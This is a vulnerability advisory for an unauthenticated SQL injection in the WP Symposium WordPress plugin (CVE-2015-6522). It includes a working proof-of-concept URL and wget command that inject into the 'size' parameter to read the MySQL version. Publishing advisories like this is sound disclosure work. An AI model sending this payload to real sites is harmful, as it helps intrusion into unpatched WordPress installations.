WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php, parameter 'size'.

The issue is exploitable even if the plugin is deactivated.
Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

Affects

Plugin wp-symposium
fixed in version 15.8

References

CVE 2015-6522
EXPLOITDB 37824
URL https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter PizzaHatHacker
Views 355
Verified Yes
WPVDB ID 8140

Timeline

Publicly Published 2015-08-09 (over 1 year ago)
Added 2015-08-09 (over 1 year ago)
Last Updated 2015-08-22 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.